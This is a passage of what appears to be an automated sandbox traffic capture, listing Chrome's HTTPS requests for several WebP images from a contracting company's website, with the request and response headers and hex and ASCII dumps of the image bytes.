                                              Data Ascii: )FFZbTcOJT$iuI@Y%+.LQUzKb4Q/MKj9Od5ncL&Tl`]6t`B542L[_(%bTDQ^|@65uF|Wa-C(20qjX^KCa=3Uu >.aflNb6=Xy1f,}52u$
                                              2024-09-27 06:20:21 UTC8000INData Raw: cb a4 66 48 19 e3 32 07 89 03 1b 46 38 43 1f d9 56 6f b0 1c 02 e9 24 61 b2 53 24 72 44 ac 76 d1 4c 8a a1 88 1d 9f f4 35 50 e9 fb d4 34 fa 76 7f 27 0a 3b 50 54 e9 56 6a 0d e4 e9 06 83 f9 36 8f a4 63 ce 9f db 5f e7 c7 e6 47 fd b5 fe 7c 54 7f 25 8d dc f7 17 fc db ab 48 6e 1d 23 96 25 8d 5a 54 0c 42 fc 02 da 46 33 f5 ef e3 7a c3 fc 94 5c 5d 4a b6 f3 eb 8a d6 e6 54 2d 7b 72 d4 78 e0 77 53 a7 5e 93 42 30 a7 d4 da b5 51 0f 1d ac 7b d4 1d 8a 06 09 a7 4f 6f 18 e5 1f 64 c3 08 5a 9a 8a 29 6d 3b 35 15 04 d3 6e 55 ff 00 c9 65 e9 af 6d 75 04 88 9c c8 a7 98 40 b6 d7 aa 00 67 f4 84 4e 65 93 40 6c f8 72 df 4f e5 2b a4 d0 00 75 70 d0 d6 b9 6d d5 95 30 1c 37 01 cc 13 55 cb fa f4 23 f9 19 ce 61 45 4f d3 4f d7 fc ad 71 aa 43 25 94 7d 2d e2 88 48 ea 92 b3 75 56 5a 3e 96 d0 f4
                                              Data Ascii: fH2F8CVo$aS$rDvL5P4v';PTVj6c_G|T%Hn#%ZTBF3z\]JT-{rxwS^B0Q{OodZ)m;5nUemu@gNe@lrO+upm07U#aEOOqC%}-HuVZ>


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              130192.168.2.465466173.231.215.1184436228C:\Program Files\Google\Chrome\Application\chrome.exe
                                              TimestampBytes transferredDirectionData
                                              2024-09-27 06:20:22 UTC465OUTGET /uploads/projects/23/c7a29cc2e7fdcacc9c3f5f4ff3bddd5f.webp HTTP/1.1
                                              Host: www.citydiamondcontracting.com
                                              Connection: keep-alive
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                              Accept: */*
                                              Sec-Fetch-Site: none
                                              Sec-Fetch-Mode: cors
                                              Sec-Fetch-Dest: empty
                                              Accept-Encoding: gzip, deflate, br
                                              Accept-Language: en-US,en;q=0.9
                                              Cookie: advanced-frontend=6hukji9m9k72lj8og62vhac8h0
                                              2024-09-27 06:20:22 UTC261INHTTP/1.1 200 OK
                                              Date: Fri, 27 Sep 2024 06:20:22 GMT
                                              Server: Apache
                                              Content-Security-Policy: upgrade-insecure-requests;
                                              Last-Modified: Wed, 11 Jan 2023 14:32:46 GMT
                                              Accept-Ranges: bytes
                                              Content-Length: 23822
                                              Connection: close
                                              Content-Type: image/webp
                                              2024-09-27 06:20:22 UTC7931INData Raw: 52 49 46 46 06 5d 00 00 57 45 42 50 56 50 38 58 0a 00 00 00 00 00 00 00 ce 04 00 a2 03 00 56 50 38 20 92 5c 00 00 70 8a 03 9d 01 2a cf 04 a3 03 3e e9 70 b2 54 29 26 2a 35 22 30 b9 f2 a0 1d 09 67 2e 1b 10 05 0b 79 07 06 b5 d7 17 dd e5 cb 1b 66 ad 79 c4 1d 05 bb 97 96 07 10 51 e9 79 e9 6f fd ff 68 9d 99 b9 fb 79 1f 74 be f1 be 36 2a 6b ff d2 1d ff 66 54 3f 34 fd f9 ff fd 42 73 e3 f3 0c eb fe 63 bd b7 ff bf 2f fb 93 b7 bc 43 2a fc cf ff 77 a3 8f 9f 7f a9 fb a1 e7 af c0 ef f3 ff 77 ee cd 8e 3f c8 ef 25 fd 83 2c 6d 1e c1 3f ff 4e 87 bf f8 e4 5b ff df 58 7f c7 f4 d3 e9 ee b4 77 ff 9e ac 3e ef 4a ea 7c 15 17 5b 2a 19 08 0a 2a 2e b6 54 32 10 14 54 5d 61 1a 01 be d8 4a 28 79 d7 ee 2f 3f e6 aa 2e b6 54 32 10 14 54 5d 6c a8 64 20 28 a8 c2 d8 d0 6c 20 33 a3 99 5d 36
                                              Data Ascii: RIFF]WEBPVP8XVP8 \p*>pT)&*5"0g.yfyQyohyt6*kfT?4Bsc/C*ww?%,m?N[Xw>J|[**.T2T]aJ(y/?.T2T]ld (l 3]6
                                              2024-09-27 06:20:22 UTC8000INData Raw: 91 0b d1 5b 80 20 ff 6d 35 10 0f fb fe 00 33 5d e4 9f 0d dd 44 45 3c c6 85 49 30 0f 81 4d 26 76 f5 84 c1 69 a9 2f ea e2 7c 4d 0b 11 4a 39 ae 64 a0 43 8b 7d d3 5f ab 4c 88 0a 96 90 20 54 c8 41 93 4d 82 83 b5 70 19 2d 0b 0b 96 07 98 1c 3c 5c 36 f3 39 7b 00 61 d5 88 41 86 89 aa b4 20 81 3e f9 52 14 8d 1a a6 e7 56 86 c6 36 66 fb 8d 4d bd fe d1 dc a8 47 4c c8 ec 9c ec df 79 06 09 27 eb 11 d6 c0 00 00 3a 8c f0 fc b2 32 2a 00 f3 5f 86 4b 14 28 5d 3b 7e e6 ca e3 e7 72 34 fc b8 80 31 1e d4 66 b9 45 eb f7 56 1f ad e8 2a 69 11 4b 6c c3 3c 34 31 ac 22 44 e2 0f ae 72 d8 e7 91 8c 9b c3 5b e2 59 81 9f 7e 10 f2 c3 76 9c 3c 78 58 17 4b b0 9f 8b 55 f7 bb 2a d4 19 4f ee 2f db 7f 77 22 5a 89 79 f8 11 93 2c d8 a9 42 7b cc a9 98 d0 8f c0 00 05 52 2f 36 5e 3d 10 00 1e 67 48 b2
                                              Data Ascii: [ m53]DE<I0M&vi/|MJ9dC}_L TAMp-<\69{aA >RV6fMGLy':2*_K(];~r41fEV*iKl<41"Dr[Y~v<xXKU*O/w"Zy,B{R/6^=gH
                                              2024-09-27 06:20:22 UTC7891INData Raw: c3 8c 85 77 fc fd 51 57 13 ac 63 67 fc 0f 07 14 e1 cb 6e 28 94 46 3e bb 89 93 d7 7f 08 0c c1 27 45 69 ec 23 66 a8 4b 12 bb db 23 da 7d b8 25 06 d3 7f 74 16 43 09 c2 f0 e7 53 e7 e5 4b a3 1a 4f 78 d5 1e 1a 95 fd bc 78 6c 7a 1f 62 e4 7e 08 ea f5 ee 72 e3 5a 2a e5 ea 6a 9c 48 8d 2b a7 d2 fe 12 59 a5 5b 58 30 cc fd c2 ba bc f9 c3 24 eb 97 8e 25 10 fe 8d c1 ce 91 9d a8 7b 4d 46 19 7d d6 6b 44 62 b4 5e cb a5 51 a1 37 44 97 87 14 6c 6a 22 0a 9c ed a1 62 6b 3d ae 7b f7 3d 81 35 a4 2b dc a3 90 a1 8f 7c 8a 08 bf 09 b4 1e ac 8a 85 1a a5 dd 56 8a ba d0 f3 87 4f ea 4a 9f 90 b5 6e 79 fc e7 4b 6f 17 57 08 3e 74 e6 99 10 8b cd 6c 8f 56 7c 30 99 7c ec 2a 13 11 64 01 10 1e d0 69 4f 13 08 06 b4 07 23 bf 94 8a d2 03 aa cb 51 bd 9d 61 d3 55 cc 7a 12 93 45 a3 49 d4 98 2e 66 c8
                                              Data Ascii: wQWcgn(F>'Ei#fK#}%tCSKOxxlzb~rZ*jH+Y[X0$%{MF}kDb^Q7Dlj"bk={=5+|VOJnyKoW>tlV|0|*diO#QaUzEI.f


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              131192.168.2.465468173.231.215.1184436228C:\Program Files\Google\Chrome\Application\chrome.exe
                                              TimestampBytes transferredDirectionData
                                              2024-09-27 06:20:22 UTC465OUTGET /uploads/projects/29/8814c125f673212d4b4567019722294a.webp HTTP/1.1
                                              Host: www.citydiamondcontracting.com
                                              Connection: keep-alive
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                              Accept: */*
                                              Sec-Fetch-Site: none
                                              Sec-Fetch-Mode: cors
                                              Sec-Fetch-Dest: empty
                                              Accept-Encoding: gzip, deflate, br
                                              Accept-Language: en-US,en;q=0.9
                                              Cookie: advanced-frontend=6hukji9m9k72lj8og62vhac8h0
                                              2024-09-27 06:20:22 UTC261INHTTP/1.1 200 OK
                                              Date: Fri, 27 Sep 2024 06:20:22 GMT
                                              Server: Apache
                                              Content-Security-Policy: upgrade-insecure-requests;
                                              Last-Modified: Tue, 10 Jan 2023 11:58:57 GMT
                                              Accept-Ranges: bytes
                                              Content-Length: 71512
                                              Connection: close
                                              Content-Type: image/webp
                                              2024-09-27 06:20:22 UTC7931INData Raw: 52 49 46 46 50 17 01 00 57 45 42 50 56 50 38 58 0a 00 00 00 00 00 00 00 ce 04 00 a2 03 00 56 50 38 20 dc 16 01 00 70 a9 05 9d 01 2a cf 04 a3 03 3e e9 6e ad 52 a9 26 37 33 a5 36 da ba e0 1d 09 67 6e 0a de db cf ab c6 53 f9 3a c4 ab f8 03 8b 0f aa 73 6b c3 37 a7 db 44 b5 a3 ff 8a 55 c9 f5 3c 66 7c 85 59 07 1f fe 37 89 d7 a5 7f aa fd 8f eb 58 ff 2b b3 b7 fc af 60 9f 36 cc d8 bf b1 db 5f 9f 37 99 90 e8 d0 3c 5f c7 8b d8 47 8e fe 46 ff b7 f2 3d 8f 34 97 f2 4d 30 fe a7 ff ff 34 7f ff 76 e8 fa f1 fe 73 d0 a6 f9 8f f5 2f fc fe 73 3e a5 fe 47 80 7f a2 76 07 ff 2d 99 3f a5 ff 57 cd af ec 5d ba 3b 55 fd bb fa cf 41 7f d8 bf b7 79 ef 45 f3 ab 94 15 fa 9f f8 cf 3e 8f d7 f3 f7 f8 8f 50 4e 1d 4a 0a 79 43 78 52 fd b3 fe e7 b1 0f f6 8f f5 df b7 64 aa 8e 01 4f 56 d5 df 25
                                              Data Ascii: RIFFPWEBPVP8XVP8 p*>nR&736gnS:sk7DU<f|Y7X+`6_7<_GF=4M04vs/s>Gv-?W];UAyE>PNJyCxRdOV%
                                              2024-09-27 06:20:22 UTC8000INData Raw: 59 3a 4b e2 23 e5 00 8f 51 f6 69 c0 b4 e7 f5 cb 0b 8e 17 ce e8 49 6d 1f ae 3e e8 73 da 0f 9c f8 f6 cf c2 8c d9 14 1d c1 14 42 d1 65 34 16 9d f4 ee 4c 03 ed 3e 43 93 fc 4b c5 28 c9 39 a0 be e6 38 5b 5e 53 25 26 a0 39 93 84 db 65 0c 8c ea b0 c9 cd 60 21 2d 61 b5 63 71 37 e5 2e 03 33 bc 00 68 f9 6e 4a 3a 8d d7 fb 14 01 39 48 6e 3e f8 c8 6f 50 26 20 2b 39 26 38 52 1c a5 eb 75 03 9c 5c d8 3a c0 3d 15 4f 9e d8 51 fd da d6 8c b7 96 6d 93 fc 17 db 76 8a 81 eb 41 5d 48 15 0f 73 13 a1 53 fb 95 9a a2 0e 01 22 0b f4 6c d7 7e e9 71 fb 0d 6a 4d dd 32 76 d3 4d 0b 82 21 5a 0d 8f 57 47 3f 90 02 28 78 2a 86 2d 59 5a 2c 8b 0c 0b 9d 74 e1 2f e0 78 08 a9 a6 d2 1c dc 3d 60 87 bc 80 77 3d f3 67 72 9e e1 e4 e5 19 1e b5 87 0c da 99 65 36 38 2b 6d f7 7c 4d 52 ac 62 0a 3f 19 97 9f
                                              Data Ascii: Y:K#QiIm>sBe4L>CK(98[^S%&9e`!-acq7.3hnJ:9Hn>oP& +9&8Ru\:=OQmvA]HsS"l~qjM2vM!ZWG?(x*-YZ,t/x=`w=gre68+m|MRb?
                                              2024-09-27 06:20:22 UTC8000INData Raw: da 56 c5 0d 41 17 a5 cd 2d 79 65 37 93 94 f0 f8 60 04 30 12 52 6c 2d 24 99 4b b0 2b 55 3e b5 d8 44 62 90 b9 cf b9 52 f4 8a c8 13 8a df 29 26 c5 15 14 76 84 76 98 03 66 4a 52 b4 72 9f 03 9a ce 3e f5 45 e4 a6 bd 42 91 94 73 2d 0d 08 eb 9a 87 cf 8a 86 22 a2 1d d9 08 a3 b4 5a 5d d4 e8 0e a0 40 7f ef 41 8f 4e b8 1e 1f c0 e6 71 eb c3 61 00 00 11 f3 84 29 60 8b 41 20 52 38 79 c6 b5 6b eb 6a aa 47 11 45 8a 17 2a 0c d7 36 cf 2c 5c 58 ac 70 f1 8b 3d 3c 56 cc 05 ed 63 0b 97 be 85 ad 0c f3 7d 46 d5 f7 9a e8 bb d1 4d 80 d8 cd 26 6a a6 0e d5 c0 cc e5 ab 0c 23 5f d8 a6 bd e2 96 77 f1 74 0e 2b ad f8 21 00 65 a9 55 39 21 b7 61 22 dd 9b 87 30 8f c7 da d4 41 91 01 ab 3a 05 50 f5 76 99 49 ec 13 12 bc 58 33 d4 06 ac 7c 74 3f 79 c3 46 ab 68 d5 a3 6d da c4 78 22 cb ac e0 3b 7f
                                              Data Ascii: VA-ye7`0Rl-$K+U>DbR)&vvfJRr>EBs-"Z]@ANqa)`A R8ykjGE*6,\Xp=<Vc}FM&j#_wt+!eU9!a"0A:PvIX3|t?yFhmx";
                                              2024-09-27 06:20:22 UTC8000INData Raw: c4 42 fa f4 77 7a 71 15 c2 55 7b ad cb e3 1a 1a 86 41 b1 a0 da a9 3c 90 cb 9e f9 1a e8 21 74 15 2e 67 bd 82 9b 6e a3 79 74 70 42 25 dd 16 a3 41 3c 85 be 80 ec c4 96 3c 83 9a 9f 11 4b 2f d3 01 94 7e 79 6e f0 f1 7b cb 31 58 75 e1 6d f9 02 fe b9 15 27 e6 ea 32 a5 bf 32 25 f0 ba 4a 09 64 78 ee 6f b4 c6 ae e8 12 29 82 36 e6 8f e2 77 e8 50 b4 06 6e df 36 06 b4 ae f8 7c 30 28 93 55 a3 3b e2 eb 67 e6 e0 04 d3 c5 67 20 75 40 d1 2c 58 58 c3 b1 0b d4 0c 16 a6 66 1a 0e e6 f9 09 85 53 d1 8b 1b d5 64 da bd d0 b2 44 55 0d 9c 71 4c 71 57 e3 f7 e7 98 87 2d 8a d6 e8 5d 55 ad 27 4e f1 29 7e 40 da 28 c7 8b f6 3c 80 a7 cd 4a 18 ab a6 d0 32 1c 28 65 46 3d 14 c3 bf 7d 6d 29 e9 56 28 58 f6 56 3a a2 a1 36 ca 6e 9a 14 65 00 1a e8 8b 45 dc 87 c4 ad 1d 92 2d df 76 07 ea 4a 9a e0 17
                                              Data Ascii: BwzqU{A<!t.gnytpB%A<<K/~yn{1Xum'22%Jdxo)6wPn6|0(U;gg u@,XXfSdDUqLqW-]U'N)~@(<J2(eF=}m)V(XV:6neE-vJ
                                              2024-09-27 06:20:22 UTC8000INData Raw: da cf 4b c8 bc a5 24 9e b5 44 df 09 16 06 5d d4 2d d0 cf cb 97 8b f9 1c 2d 24 36 1d 96 19 fe ff 6d 6f a2 40 39 d8 32 16 48 23 7e e0 90 a7 eb 64 67 a9 eb fd 62 31 c4 d9 c0 e6 40 26 ad 74 0c ab fe a5 5a 39 57 56 db 61 0a d6 b2 d7 18 c8 7e 60 39 9d 33 b4 6d 89 80 10 fc 28 c8 83 a2 a3 a8 71 36 00 63 da 52 c9 75 7b ff 0f a4 7d 19 d4 0b cd ef 4d 66 b8 a2 88 ea ea 2b 16 9e 4d 6c 47 c9 4a b3 26 b6 ae 75 bd 25 da 6e eb 53 34 81 51 53 d8 7f 56 8a cb 82 74 18 0b 66 3f b5 ea 6c 3e fe 34 1b 6b 03 3b a9 1b b3 e8 3a 77 25 3b df 2a 7c b4 4c 73 d0 7b 2a 41 20 7a 61 ba be dd 6c 84 ca 15 28 06 7c 2f 8b 1d e7 30 71 ef dc 6a b4 2b 97 c2 ac ab c1 17 7a 00 31 4d d6 4e ce 86 17 6c 68 6b 1a 41 cd 1c 27 95 f7 69 66 5b c8 26 87 04 9c e5 52 5d 48 1e 87 54 e0 02 82 1b b0 60 dd b9 8e
                                              Data Ascii: K$D]--$6mo@92H#~dgb1@&tZ9WVa~`93m(q6cRu{}Mf+MlGJ&u%nS4QSVtf?l>4k;:w%;*|Ls{*A zal(|/0qj+z1MNlhkA'if[&R]HT`
                                              2024-09-27 06:20:22 UTC8000INData Raw: 96 b4 a9 30 c9 ec 08 76 eb 7f 70 93 7b 72 fd 9d 02 61 1e 98 04 89 fc ec 9d 94 91 2f 18 ed 78 3f 61 38 74 d7 0c 83 cc 22 f8 5d df 10 9c cb da e6 4e 31 b8 37 0b 4b 85 a8 24 a5 ba 5d bd 7e 76 96 7c 5b 4c 46 d6 e6 c0 ea f9 4d dd 2b 3d 64 4f d3 24 ae 75 6a 46 4b a6 c8 e2 97 51 00 b1 29 ba 0b d2 89 4a 70 2d 8f ab e3 bc 87 86 37 8b 8e e8 d1 c2 93 8d e6 63 69 99 20 fd dc 44 97 ba e4 91 51 d8 00 96 71 ea 49 5c c2 5e 59 b9 ab c7 fd 49 31 14 2f 18 68 30 5f 03 72 2c 73 2d bb 15 cb 3d 47 6b bb 11 23 49 02 d6 38 3b 45 38 39 4e e1 94 f5 51 04 d5 d6 46 63 ae e0 b2 0d e5 88 15 44 2a 40 e5 80 4c dc 0f 49 69 21 f0 c2 c9 39 28 fc 88 e9 7c 72 66 ae 85 31 5b 15 9f 7c 53 f8 33 10 d1 70 cf 9b 08 df 1e eb 37 39 d4 c7 f0 a3 25 f0 ce 46 25 53 b8 78 18 2f f2 4c 77 94 54 2a 7c 5e 76
                                              Data Ascii: 0vp{ra/x?a8t"]N17K$]~v|[LFM+=dO$ujFKQ)Jp-7ci DQqI\^YI1/h0_r,s-=Gk#I8;E89NQFcD*@LIi!9(|rf1[|S3p79%F%Sx/LwT*|^v
                                              2024-09-27 06:20:22 UTC8000INData Raw: a9 9a 30 6c ad cf b9 02 b3 3b 81 8e fe e1 5c 3a e0 ef f6 31 b6 11 05 71 4c b7 69 fd f3 54 d7 0d f4 fa a9 66 20 44 2b 36 bc 65 22 ed 89 34 68 0d 96 7f d8 f5 b6 5e 6d 99 1a 0e 48 cb c4 95 d0 9a ef 83 36 ec 81 bc 92 3b 0a 87 45 4c 4c 5b b9 19 c3 d9 b2 c9 e9 0c 4b 1c c0 01 a7 5f c1 ff e2 f5 d0 03 47 f9 bb 5d ba 5b 0e 59 43 10 e7 d3 b5 e0 9e 20 7f 0e 17 09 e3 ef 0a c1 a8 fe b7 0d 0d da 25 49 8b 57 79 fc 6c bd 2c be 2a 8a a8 ac f9 33 99 10 ba 16 04 99 1f b4 f4 e2 e7 bf 65 ff 3b 0f be b1 12 35 95 a5 ba 40 c6 bf 8c 18 56 79 ce 54 80 2f a5 ad 15 66 80 bc 21 69 f9 26 b1 61 49 3a 2e e6 21 cc 13 e5 60 4d ee ea 64 e2 5d 06 6b cb a6 71 42 be e3 43 93 d7 27 bf 9e b1 bd e8 fb 7b c5 1c c0 aa 75 46 05 2e 27 5c 50 e3 41 c0 16 e5 ea a1 9d 05 76 91 58 6d 0b 1d 26 7a e6 ed 41
                                              Data Ascii: 0l;\:1qLiTf D+6e"4h^mH6;ELL[K_G][YC %IWyl,*3e;5@VyT/f!i&aI:.!`Md]kqBC'{uF.'\PAvXm&zA
                                              2024-09-27 06:20:22 UTC8000INData Raw: 5f 8c 0d 9c e8 5a 6c 68 4b 36 29 bf 1a 27 d9 70 ff 66 2e 98 a3 a5 af 67 d6 da b9 f9 9b 75 28 aa 50 31 62 d3 11 5a 84 1a ad 98 5c 19 69 55 32 67 c8 55 9d 5d 78 8a 6b 38 94 a4 df f4 bd ac ce 1d ee a0 f3 d4 ff f7 11 81 41 3e 8f 28 33 32 93 aa 9c 2a 0d 8b 93 0e 3e ef 2c e8 78 78 0a 8d c1 59 3b 5c 0d 4d f9 44 3b 98 09 75 70 11 7a c4 95 0c 4a 6f 3a 24 aa 3e ad 68 20 90 dd 4d 87 1d dc 2e 77 4e 36 96 4b f6 db 94 39 dc cd d3 62 4e aa a3 22 3e 91 bc 50 ea 97 e4 b3 44 2e f7 b5 3c ee 61 13 02 ca 78 b2 4b 65 e6 87 d6 9d 65 a9 11 fe f2 9d 29 66 b6 7e d7 b0 11 76 d6 3b a0 6d fc 72 bb 67 68 6e 72 ad 1b 2b f5 6b 10 7e 94 26 0a 0f 3f 7b d7 f2 24 fe fa 5c 86 ed 58 c6 88 29 57 1b 22 5c 00 4b d8 e0 32 48 ae bb 02 f6 ec ea 34 d7 0d 0a 45 ef d8 24 17 df ae f3 da fe 4c 91 92 53
                                              Data Ascii: _ZlhK6)'pf.gu(P1bZ\iU2gU]xk8A>(32*>,xxY;\MD;upzJo:$>h M.wN6K9bN">PD.<axKee)f~v;mrghnr+k~&?{$\X)W"\K2H4E$LS
                                              2024-09-27 06:20:22 UTC7581INData Raw: 5a 17 f8 7a 87 f0 f4 ab 31 37 0d 2b cc e3 ab 95 b1 b0 4c 2c 3c 26 46 84 ec 0c 45 f4 2a f7 c6 50 6b 81 90 57 09 9a a1 80 6c e9 39 06 9a 0a 5e fc 77 3a c8 8e 9f 4f 61 6d a6 19 1d 42 a5 b2 f7 ea af a5 4e 69 38 f2 80 bb e7 b0 06 7f 1f 44 b0 6d 74 6c 89 87 b6 9d 94 62 47 3c ef 27 a5 63 5a c4 21 45 d1 72 ea 1c d2 11 b0 51 87 39 10 94 fe 78 bc cc 03 ea 48 3c 44 87 81 a8 0c 2b 18 5a df e6 76 54 f3 44 3e e1 d4 f8 20 42 bc f1 13 52 91 d1 0a 8a 77 79 1b 31 d7 0d 60 55 9b f3 13 ed 34 83 1d d9 09 47 2d 7e 29 5a 2b 82 1d c7 0b ea cd ca 7c 6f 76 09 6c 00 54 89 21 01 29 32 bb f0 4d 0f da 03 31 fd 93 bb 20 48 5c ed 4e 91 c0 04 a0 ff 49 64 56 82 6c a0 9e 00 1e cc fb 93 e7 df d2 40 03 15 77 eb 1a 43 48 48 eb 18 10 7b f1 0f 84 53 5c f3 89 eb 80 0f c5 5f 9b 2b cc f7 c1 12 09
                                              Data Ascii: Zz17+L,<&FE*PkWl9^w:OamBNi8DmtlbG<'cZ!ErQ9xH<D+ZvTD> BRwy1`U4G-~)Z+|ovlT!)2M1 H\NIdVl@wCHH{S\_+


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              132192.168.2.465467173.231.215.1184436228C:\Program Files\Google\Chrome\Application\chrome.exe
                                              TimestampBytes transferredDirectionData
                                              2024-09-27 06:20:22 UTC465OUTGET /uploads/projects/25/9d9712f45a8ff4b4f837c7761f37a2b1.webp HTTP/1.1
                                              Host: www.citydiamondcontracting.com
                                              Connection: keep-alive
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                              Accept: */*
                                              Sec-Fetch-Site: none
                                              Sec-Fetch-Mode: cors
                                              Sec-Fetch-Dest: empty
                                              Accept-Encoding: gzip, deflate, br
                                              Accept-Language: en-US,en;q=0.9
                                              Cookie: advanced-frontend=6hukji9m9k72lj8og62vhac8h0
                                              2024-09-27 06:20:22 UTC261INHTTP/1.1 200 OK
                                              Date: Fri, 27 Sep 2024 06:20:22 GMT
                                              Server: Apache
                                              Content-Security-Policy: upgrade-insecure-requests;
                                              Last-Modified: Tue, 10 Jan 2023 11:48:34 GMT
                                              Accept-Ranges: bytes
                                              Content-Length: 64182
                                              Connection: close
                                              Content-Type: image/webp
                                              2024-09-27 06:20:22 UTC7931INData Raw: 52 49 46 46 ae fa 00 00 57 45 42 50 56 50 38 58 0a 00 00 00 00 00 00 00 ce 04 00 a2 03 00 56 50 38 20 3a fa 00 00 70 c6 04 9d 01 2a cf 04 a3 03 3e e9 70 af 52 a9 26 2e bb a4 f6 aa 1b 70 1d 09 65 6e dc b6 5f 2f 3c fe 1f 11 55 e4 fd e7 20 b8 a2 f5 de 4b ff e3 f3 cf e7 3c ad 3c 6a 63 ff 9e e3 67 37 8e c1 e9 3f ef 79 a1 73 b4 7e 32 e7 66 79 37 be 37 d2 ef 36 e2 21 ec 4f f8 f5 5a c8 0f c7 b3 c7 f8 fe fc 9f fd fd 82 7f 96 f4 c3 f4 3f ea 77 fb 57 44 ff 9c ff 4e 67 ad 9f f5 7e 9b 8f 4c 8f 5a ad 34 9f 9c fe e1 fa 58 fa 1f 5f bf 9a 7d b3 fc df f1 1f e9 7d fc 7f 69 ca 9f cc 7f 93 e6 9f de 2c ef ff 89 fb 63 e3 ff eb ff cc fa 04 7b af cf b7 f5 bf 70 7c 11 b6 6f f9 7f b7 7e c1 7e e1 7e 03 cf 67 f4 bf f7 fa 3b fb ff fb 0f 60 3f 34 bc 25 7f 39 ff af d8 37 f6 37 ac 2f fc
                                              Data Ascii: RIFFWEBPVP8XVP8 :p*>pR&.pen_/<U K<<jcg7?ys~2fy776!OZ?wWDNg~LZ4X_}}i,c{p|o~~~g;`?4%977/
                                              2024-09-27 06:20:22 UTC8000INData Raw: a4 25 1a 82 96 eb 14 a6 58 84 7f 3b 45 76 8a 56 f3 49 16 f0 59 70 d3 1e 05 26 b3 24 d0 2b 41 c7 85 49 cb b4 ae fc e0 3a 99 5c b2 7a 42 16 0f cd 1b 2b 3e 59 3b 13 9d ad 5f ab 46 0f 49 bb 0a 0d 42 93 91 26 17 25 6c 0c df 9b 13 1b 9b c8 40 d8 fd cb 12 26 ff fa e3 67 5b c2 d2 13 a1 63 47 c0 c2 5b 90 30 6f 3c 9a 03 e7 0d e7 bc 7c 14 da 4c 3b 08 9b 17 27 3e 64 2a ad 00 d2 c4 df 17 c1 9e 4d a6 4d 70 b6 e2 d9 ba 55 83 ff 38 1b 47 3d 99 b0 0a 04 d2 63 10 e7 83 90 d2 83 ee ec 6e d0 3f dc 12 c3 b1 4d c6 a1 ee b1 cf a9 1b 31 b4 49 d9 38 e5 05 57 62 0a 78 f8 fc c7 7d 79 c5 3c 06 bd cb 3e ca bc c7 87 f2 0f 83 80 49 8c 1f 5c 7a 13 e9 f0 ba 6a aa d6 6a dc 1f f9 7d 9e ba 8e 02 36 e3 07 a5 e9 00 b9 8b c3 e3 27 75 27 ea 35 fe 38 d4 f3 9d 0e 2d 9f b4 84 54 2c 6a bc 71 a1 b3
                                              Data Ascii: %X;EvVIYp&$+AI:\zB+>Y;_FIB&%l@&g[cG[0o<|L;'>d*MMpU8G=cn?M1I8Wbx}y<>I\zjj}6'u'58-T,jq
                                              2024-09-27 06:20:22 UTC8000INData Raw: 74 eb 31 e6 46 fb 98 43 f3 07 e9 8e 9b cd f6 de cc fb 51 28 c3 a0 cd ba 07 49 f7 18 a4 80 33 2b 8d e8 bc 0a e0 37 f2 88 1a 77 c8 89 b5 83 33 16 c6 b9 d1 e7 78 45 9b 75 70 e2 e8 07 66 7e 31 86 47 e0 8a 6a 26 9a 4f e4 0e 1e 6d 8e 61 89 ef 29 08 c1 fa 73 8b 81 e0 38 de 8a 06 26 b2 31 22 f9 b3 4e c4 97 15 1f 90 eb c6 98 0f 2c 15 08 fe 1c 79 23 8c 45 45 c9 2c 62 ac ea 41 f8 ca 59 f3 2e 19 7d 7d 1d 3c a4 0a 5e 7c b7 7e 0c 96 f9 50 ad ba 29 84 89 f6 45 8a 50 ac 1f 1a db 2e 14 76 5d fb eb b5 d3 07 39 3d 84 37 cf 6d 99 cf 26 f0 2f f5 24 1f 56 d7 32 d5 79 fb 0c b3 ee 6e 34 f6 19 f0 de d9 98 06 03 72 9c 00 96 77 c5 74 ca dc 33 cc 5a bd b4 fc 77 4e 8e e0 06 f5 d8 52 ca ca 17 6a e3 50 a7 51 05 62 89 11 1f ff 0e 31 a9 e3 f6 3d fb b1 80 37 25 61 21 24 09 6e dd 5d 6e 2a
                                              Data Ascii: t1FCQ(I3+7w3xEupf~1Gj&Oma)s8&1"N,y#EE,bAY.}}<^|~P)EP.v]9=7m&/$V2yn4rwt3ZwNRjPQb1=7%a!$n]n*
                                              2024-09-27 06:20:22 UTC8000INData Raw: d8 2e 79 73 c7 eb e6 5c 18 67 26 22 dd a0 3f db 20 0e 5a f2 34 ba c7 68 57 0b 6b 20 8c 4a 17 d6 7d c3 ab 79 31 96 83 23 9b 3e 2a f0 78 46 a8 2c 24 2d 80 75 9e 38 97 b8 89 07 a4 00 8f 9f 43 b0 4b 13 55 97 e0 dc de 4c cb 9a 42 7b ee ee a3 80 d3 d1 6f 86 4a 02 a2 5e a2 c8 f0 f8 70 03 23 a7 8c 9b 75 5f 39 cf 95 6a f9 71 71 bf 48 17 75 d2 8b 31 b0 fa 51 2f 4e bf 9a cf 98 95 45 29 1b 68 85 9b 91 b7 30 95 a5 25 ff 47 07 d7 3b b3 37 6c 04 a3 c9 1f 48 37 10 f7 bc 3a 70 c3 53 b3 d9 1a f3 c7 ea ec 7f 7b 91 57 19 2d ae b3 f3 89 82 30 42 c2 91 c2 9d 03 7a 33 f7 ca 74 01 18 5f b0 ce 1f 09 ae d9 f6 88 bd a5 90 18 3b 40 a5 a3 4a 95 e7 6b 9b 7a e7 f4 22 bb 4a 32 98 58 b4 27 01 e9 4a a9 74 c5 44 96 b1 7b a6 e3 bf 10 9a ac 93 db 0b 65 df ee ff 36 6d 1b 07 9f c2 18 cc c4 ec
                                              Data Ascii: .ys\g&"? Z4hWk J}y1#>*xF,$-u8CKULB{oJ^p#u_9jqqHu1Q/NE)h0%G;7lH7:pS{W-0Bz3t_;@Jkz"J2X'JtD{e6m
